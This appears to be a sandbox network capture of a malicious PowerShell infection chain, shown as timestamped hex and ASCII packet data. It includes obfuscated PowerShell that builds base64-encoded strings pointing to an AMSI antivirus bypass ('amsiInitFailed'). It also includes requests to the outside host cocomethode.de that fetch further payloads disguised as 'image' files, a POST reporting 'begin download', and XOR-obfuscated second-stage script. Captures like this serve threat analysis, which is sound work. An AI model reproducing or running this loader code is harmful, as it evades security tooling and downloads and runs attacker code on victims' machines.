2024-12-11 11:44:01 UTC	1369	IN	Data Raw: 6c 69 61 55 4a 4b 59 6d 35 53 55 57 52 49 53 57 64 53 4d 6c 59 77 55 6d 30 35 65 56 70 58 5a 48 6c 69 4d 31 5a 31 57 6b 5a 6b 63 47 4a 74 55 6e 5a 6b 65 57 64 77 54 33 6c 43 4f 55 70 35 51 58 52 55 52 30 5a 31 57 6a 4e 57 61 46 6f 79 56 57 64 52 4d 55 35 76 57 56 68 4b 64 30 39 35 51 6d 4a 6b 62 54 6c 77 57 6b 59 78 59 6c 59 79 62 48 56 4e 65 6b 70 6b 54 32 70 77 56 47 46 48 4f 54 4e 57 4d 6d 78 31 57 6b 63 35 4d 30 74 47 64 46 68 68 56 7a 52 36 54 57 77 77 4e 6b 39 72 5a 47 78 6b 52 56 70 32 59 32 31 57 62 6d 4e 74 4f 54 46 69 62 56 4a 59 59 56 63 31 61 32 49 7a 59 32 39 4c 55 33 64 6e 54 55 4e 72 54 6b 4e 6e 50 54 30 3d 22 29 29 3b 0a 24 62 7a 6d 65 6b 74 6e 69 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e Data Ascii: liaUJKYm5SUWRISWdSMlYwUm05eVpXZHliM1Z1WkZkcGJtUnZkeWdwT3lCOUp5QXRUR0Z1WjNWaFoyVWdRMU5vWVhKd095QmJkbTlwWkYxYlYybHVNekpkT2pwVGFHOTNWMmx1Wkc5M0tGdFhhVzR6TWwwNk9rZGxkRVp2Y21WbmNtOTFibVJYYVc1a2IzY29LU3dnTUNrTkNnPT0="));$bzmektni=[System.Text.Encoding]::ASCII.
2024-12-11 11:44:01 UTC	938	IN	Data Raw: 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 6d 39 75 55 48 56 69 62 47 6c 6a 22 29 29 3b 0a 24 78 69 63 70 64 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 58 32 56 75 59 57 4a 73 5a 57 51 3d 22 29 29 3b 0a 24 65 77 6f 6a 69 6a 69 79 6a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 62 51 3d 3d 22 29 29 3b 0a 24 6c 6e 7a 62 7a 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e Data Ascii: t]::FromBase64String("Tm9uUHVibGlj"));$xicpd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("X2VuYWJsZWQ="));$ewojijiyj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bQ=="));$lnzbz=[System.Text.
2024-12-11 11:44:01 UTC	1369	IN	Data Raw: 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 59 57 31 7a 61 55 6c 75 61 58 52 47 59 57 6c 73 5a 57 51 3d 22 29 29 3b 0a 24 69 6b 66 65 62 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 22 29 29 3b 0a 24 67 71 72 78 74 67 77 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 64 43 35 42 64 58 52 76 62 57 46 30 61 57 39 75 4c 6b 46 74 63 32 6c 56 64 47 Data Ascii: em.Convert]::FromBase64String("YW1zaUluaXRGYWlsZWQ="));$ikfeb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));$gqrxtgw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dC5BdXRvbWF0aW9uLkFtc2lVdG
2024-12-11 11:44:01 UTC	69	IN	Data Raw: 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 28 24 64 6e 6b 6c 66 79 78 64 6a 6e 20 2b 20 24 62 73 6c 6c 6c 75 61 74 61 29 29 29 29 3b 0a Data Ascii: ng([System.Convert]::FromBase64String(($dnklfyxdjn + $bsllluata))));

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:03 UTC	369	OUT	GET /file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/193 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:44:04 UTC	1278	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:04 GMT Content-Type: application/octet-stream Content-Length: 2870 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wbWYiMd%2FS2bRM4tOLsIyI2D3%2B3CzkPpF4e7TL7FBbQKpHSuppVkoYAfbnlV1C4vr60PjM%2BJ16Og6kYtCuj%2FodKp891FqgKQ3DpYUQvrlKxXeq3H2XKwmxEfy9oqKAOsoeQcobewEdrU7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1095&min_rtt=1064&rtt_var=135&sent=13&recv=11&lost=0&retrans=0&sent_bytes=14382&recv_bytes=2178&delivery_rate=6494661&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0538754e89138d-ATL server-timing: cfL4;desc="?proto=TCP&rtt=47&min_rtt=47&rtt_var=23&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=650&delivery_rate=0&cwnd=59&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=633&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:04 UTC	416	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 35 36 26 6d 69 6e 5f 72 74 74 3d 35 36 26 72 74 74 5f 76 61 72 3d 32 38 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 36 32 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 34 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 38 31 31 26 6d 69 6e 5f 72 74 74 3d 31 31 33 Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=56&min_rtt=56&rtt_var=28&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=624&delivery_rate=0&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=113811&min_rtt=113
2024-12-11 11:44:04 UTC	1044	IN	Data Raw: 25 65 6c 6c 71 75 63 76 64 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 55 57 53 60 60 44 38 49 55 55 47 60 53 31 34 75 55 57 53 53 64 54 30 44 50 6c 30 51 53 47 44 7b 55 57 53 4b 4f 57 71 44 53 6c 71 4e 57 46 4f 37 55 6b 4b 60 60 47 6d 70 5b 7b 53 5b 57 30 5b 73 55 57 65 57 4c 54 30 70 54 55 57 4e 53 46 53 70 55 6b 4b 53 4c 30 71 49 53 59 65 5b 57 47 44 30 56 56 71 6b 4f 57 71 59 52 6c 69 51 57 47 5b 70 55 31 53 73 4c 31 34 49 57 6c 71 4f 53 46 72 78 55 6d 65 47 4c 6a 30 37 5b 7b 53 60 53 47 44 78 55 6f 71 42 60 47 71 44 55 55 53 4f 53 47 5b 75 55 30 65 47 4c 47 71 49 52 Data Ascii: %ellqucvd<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#UWS``D8IUUG`S14uUWSSdT0DPl0QSGD{UWSKOWqDSlqNWFO7UkK``Gmp[{S[W0[sUWeWLT0pTUWNSFSpUkKSL0qISYe[WGD0VVqkOWqYRliQWG[pU1SsL14IWlqOSFrxUmeGLj07[{S`SGDxUoqB`GqDUUSOSG[uU0eGLGqIR
2024-12-11 11:44:04 UTC	1369	IN	Data Raw: 4f 73 58 55 4b 56 4f 57 69 55 50 55 6d 4b 50 30 48 78 56 57 65 35 4c 57 71 54 62 31 34 45 60 54 47 6f 52 54 4f 43 60 33 53 58 52 6f 43 4b 53 45 43 6f 52 56 30 6e 4c 46 53 48 50 6f 71 51 60 55 69 33 56 55 48 34 60 6c 48 78 4c 56 79 6a 53 33 69 33 56 6a 65 57 65 57 71 49 57 59 5b 4e 60 6a 44 30 56 57 65 46 63 57 6a 78 53 6c 69 4f 57 46 53 6e 56 57 65 57 4c 47 71 49 55 55 47 4f 57 31 34 72 55 6a 53 72 60 44 30 75 57 55 53 4e 53 47 6d 35 55 56 30 47 4c 31 34 44 55 55 4b 51 53 31 6a 79 55 6b 4b 60 60 6a 34 49 52 55 53 5b 63 57 5b 70 55 6a 53 57 65 30 71 70 56 6c 79 4e 57 31 34 75 56 6c 71 73 4c 54 38 54 56 6c 6d 5b 57 30 54 79 56 59 71 43 64 47 71 54 56 59 69 5b 57 47 6a 30 55 54 53 53 64 6d 71 59 55 55 4b 4e 53 31 57 34 55 30 53 5b 4c 54 34 75 57 59 71 51 57 Data Ascii: OsXUKVOWiUPUmKP0HxVWe5LWqTb14E`TGoRTOC`3SXRoCKSECoRV0nLFSHPoqQ`Ui3VUH4`lHxLVyjS3i3VjeWeWqIWY[N`jD0VWeFcWjxSliOWFSnVWeWLGqIUUGOW14rUjSr`D0uWUSNSGm5UV0GL14DUUKQS1jyUkK``j4IRUS[cW[pUjSWe0qpVlyNW14uVlqsLT8TVlm[W0TyVYqCdGqTVYi[WGj0UTSSdmqYUUKNS1W4U0S[LT4uWYqQW
2024-12-11 11:44:04 UTC	457	IN	Data Raw: 32 4c 44 75 45 54 56 75 73 56 55 48 34 4c 56 4b 74 54 56 65 4c 57 45 43 6f 55 57 53 7b 55 6a 4f 6f 60 31 71 57 4c 30 4b 6e 58 33 34 53 65 47 54 78 64 46 79 60 56 44 47 6f 55 47 69 4f 5b 31 30 54 57 55 65 44 54 56 38 4a 5b 6d 44 76 52 33 5b 53 4c 44 75 44 54 56 38 4e 50 33 62 38 51 50 3c 3c 23 28 28 3a 0b 25 6c 76 63 71 79 75 70 66 77 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 33 4f 37 63 32 5b 4c 4c 6a 34 33 56 55 48 34 65 47 71 58 54 6c 38 68 4c 6d 4b 72 55 46 30 52 63 44 76 78 56 6f 43 68 53 30 57 34 55 49 Data Ascii: 2LDuETVusVUH4LVKtTVeLWECoUWS{UjOo`1qWL0KnX34SeGTxdFy`VDGoUGiO[10TWUeDTV8J[mDvR3[SLDuDTV8NP3b8QP<<#((:%lvcqyupfw<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe3O7c2[LLj43VUH4eGqXTl8hLmKrUF0RcDvxVoChS0W4UI

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:04 UTC	285	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596bae5c01e61a69043ec64a29656e39e6e0b HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 303
2024-12-11 11:44:04 UTC	303	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 63 6f 63 6f 6d 65 74 68 6f 64 65 2e 64 65 2f 66 69 6c 65 32 2f 31 62 63 61 34 63 37 33 34 62 34 31 37 33 31 38 36 63 65 64 38 33 31 34 31 36 38 34 64 36 39 33 31 63 31 62 33 33 39 63 63 31 36 61 38 63 35 64 63 66 31 34 32 30 30 66 38 34 37 31 32 39 64 31 63 35 37 33 37 66 61 62 38 38 61 65 64 31 65 35 32 34 39 34 37 63 37 64 37 64 61 30 61 34 39 62 37 39 65 62 61 39 35 63 38 39 37 34 65 63 30 39 36 35 61 36 33 38 38 64 34 36 37 30 61 64 33 38 30 35 66 39 61 34 64 62 30 64 65 65 64 64 66 66 36 65 62 39 32 36 65 64 31 66 65 61 33 66 66 35 62 35 62 63 33 65 62 39 66 39 61 66 36 63 62 64 39 64 31 39 65 30 39 39 32 31 34 63 61 32 63 36 39 35 64 32 65 62 63 32 65 Data Ascii: [ "\"begin download https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2e
2024-12-11 11:44:05 UTC	1357	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:04 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Np59%2BnN30GeJQE6Sd4YPBBEOiFk6qw0Stg35diVmt7IvQFwymlp2dXD3Nvbnh0DqrshKmuNTmjLUFypbjcF%2BR49khIJkcZF4qaIAxbMCHQHH7m77B9d274IQuNt5eNRTN6QpYn%2FtpYHK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1092&min_rtt=1064&rtt_var=83&sent=18&recv=15&lost=0&retrans=0&sent_bytes=18121&recv_bytes=3296&delivery_rate=6494661&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05387cfa89b0b7-ATL server-timing: cfL4;desc="?proto=TCP&rtt=46&min_rtt=46&rtt_var=23&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=863&delivery_rate=0&cwnd=124&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=848&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=42&min_rtt=42&rtt_var=21&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:05 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 37 37 34 26 6d 69 6e 5f 72 74 74 3d 31 31 33 37 33 35 26 72 74 74 5f 76 61 72 3d 32 34 30 35 33 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 34 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 34 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 34 31 26 63 77 6e 64 3d 32 33 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 62 32 37 35 35 37 39 39 65 63 32 31 30 36 36 26 74 73 3d 36 33 36 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113774&min_rtt=113735&rtt_var=24053&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1248&delivery_rate=33641&cwnd=237&unsent_bytes=0&cid=5b2755799ec21066&ts=636&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:05 UTC	365	OUT	GET /file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:44:06 UTC	1317	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:06 GMT Content-Type: application/octet-stream Content-Length: 2872 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMnLdjhhkxeHWDVn3lBHmGA7TIMQ4OMyG27lAeORNXD7O9kCUPjAzDZES3K%2BS0dvkGuq6QDezezHsbu44LbV9pwgbyVpD%2F%2BPXwekiuQwVK9fIx4e%2FGDRKcA0NMQmm0njZfetWtBtsZB1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13688&min_rtt=1185&rtt_var=20209&sent=24470&recv=11158&lost=0&retrans=0&sent_bytes=35052965&recv_bytes=129129&delivery_rate=47390163&cwnd=270&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0538828a7e12ef-ATL server-timing: cfL4;desc="?proto=TCP&rtt=45&min_rtt=45&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=620&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113940&min_rtt=113865&rtt_var=24141&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1003&delivery_rate=33559&cwnd=252&unsent_bytes=0&cid=ab82419c0415d05c&ts=843&x=0"
2024-12-11 11:44:06 UTC	52	IN	Data Raw: 25 79 72 7b 77 74 69 72 70 69 6c 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 Data Ascii: %yr{wtirpil<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)
2024-12-11 11:44:06 UTC	1369	IN	Data Raw: 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 55 45 4b 60 62 46 4b 49 57 59 6d 4c 64 6d 57 37 56 56 71 6f 64 44 35 78 55 55 4b 5b 60 6d 47 32 55 55 4b 60 60 30 71 54 60 32 69 4f 57 31 57 35 55 59 71 4f 4c 54 38 59 53 6c 75 51 53 47 57 34 56 57 53 6f 65 31 38 59 52 55 4f 4f 63 54 30 37 56 57 53 5b 64 47 6d 37 63 46 75 4f 64 6a 30 32 55 59 71 42 60 57 71 70 50 6c 79 4e 53 44 57 37 55 54 53 6b 65 31 38 49 54 6c 6d 60 57 44 34 72 56 6d 53 46 63 57 6a 78 54 55 53 4e 57 44 44 31 55 56 30 53 64 44 34 59 57 6c 69 4e 4c 6a 30 32 55 56 71 6a 60 54 34 44 58 7b 43 51 57 31 5b 72 56 57 53 6f 4f 44 34 70 5b 46 79 4f 4c 6d 57 34 55 6a 53 6a 60 57 71 44 56 55 43 51 53 30 47 34 55 6d 53 42 60 44 30 44 60 32 69 Data Ascii: ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#UEK`bFKIWYmLdmW7VVqodD5xUUK[`mG2UUK``0qT`2iOW1W5UYqOLT8YSluQSGW4VWSoe18YRUOOcT07VWS[dGm7cFuOdj02UYqB`WqpPlyNSDW7UTSke18ITlm`WD4rVmSFcWjxTUSNWDD1UV0SdD4YWliNLj02UVqj`T4DX{CQW1[rVWSoOD4p[FyOLmW4UjSj`WqDVUCQS0G4UmSB`D0D`2i
2024-12-11 11:44:06 UTC	1369	IN	Data Raw: 31 6d 45 50 56 65 4b 50 31 47 6f 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4a 53 31 71 33 56 6a 69 73 5b 30 43 55 50 56 75 68 53 7b 6d 74 57 47 65 56 64 6c 4c 78 53 6c 34 60 56 44 30 6f 5b 6a 4f 42 53 46 48 78 4f 55 4b 60 56 44 6e 76 57 6a 62 35 65 47 4f 74 55 6f 5b 68 60 6f 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 47 63 49 57 6a 63 55 6d 78 56 6d 4c 79 56 47 71 59 52 6d 4f 60 56 44 58 79 56 6d 69 4e 4c 44 6d 45 4c 57 5b 6b 63 56 75 6f 52 6a 69 56 64 56 47 55 50 59 53 54 57 30 58 76 58 54 62 34 60 31 6d 46 50 6f 5b 6b 4c 30 47 6f 55 47 57 6e 63 47 6d 59 54 6c 79 6b 63 6a 30 6f 52 6a 65 6e 63 47 6d 59 54 6c 79 6b 63 6a 30 6f 55 47 57 4a 65 6d 71 48 60 33 65 4a 53 31 71 33 56 6a 69 73 Data Ascii: 1mEPVeKP1Go[YbvR1mEPVeKP1GoRTOC[1mEPVeJS1q3Vjis[0CUPVuhS{mtWGeVdlLxSl4`VD0o[jOBSFHxOUK`VDnvWjb5eGOtUo[h`oONP3mC[1mEPVeKP1GoRTOC[1mGcIWjcUmxVmLyVGqYRmO`VDXyVmiNLDmELW[kcVuoRjiVdVGUPYSTW0XvXTb4`1mFPo[kL0GoUGWncGmYTlykcj0oRjencGmYTlykcj0oUGWJemqH`3eJS1q3Vjis
2024-12-11 11:44:06 UTC	82	IN	Data Raw: 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 29 25 6d 60 69 62 64 6d 65 6d 21 2a 21 25 79 72 7b 77 74 69 72 70 69 6c 28 28 28 28 3a 0b Data Ascii: ;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof))%m`ibdmem!*!%yr{wtirpil((((:

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:44:07 UTC	365	OUT	GET /file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de
2024-12-11 11:44:08 UTC	1297	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:44:08 GMT Content-Type: application/octet-stream Content-Length: 21738 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vjf14NOF3Y1qWbzkNWaaTTFjdGzaI%2FCr0EzL82lTtg%2BC1sm4bBujO512Sae5fAdsaPQxxZpLV2aBQ%2FW3BfkoS40IKvPq67Fo7vnv3PBFqqgp7zUuSa6tObM%2B5VytHaMX9Ax%2FE9b5PKUu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21014&min_rtt=1185&rtt_var=27280&sent=24480&recv=11167&lost=0&retrans=0&sent_bytes=35058279&recv_bytes=132423&delivery_rate=47390163&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05388eaa377bd5-ATL server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=41&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=625&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=41&min_rtt=41&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=620&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:44:08 UTC	220	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 33 37 34 39 26 6d 69 6e 5f 72 74 74 3d 31 31 33 36 37 39 26 72 74 74 5f 76 61 72 3d 32 34 30 39 36 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 35 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 30 33 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 33 36 31 37 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 31 34 65 33 33 33 65 63 64 37 34 39 31 34 62 62 26 74 73 3d 38 35 35 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=113749&min_rtt=113679&rtt_var=24096&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1003&delivery_rate=33617&cwnd=252&unsent_bytes=0&cid=14e333ecd74914bb&ts=855&x=0"
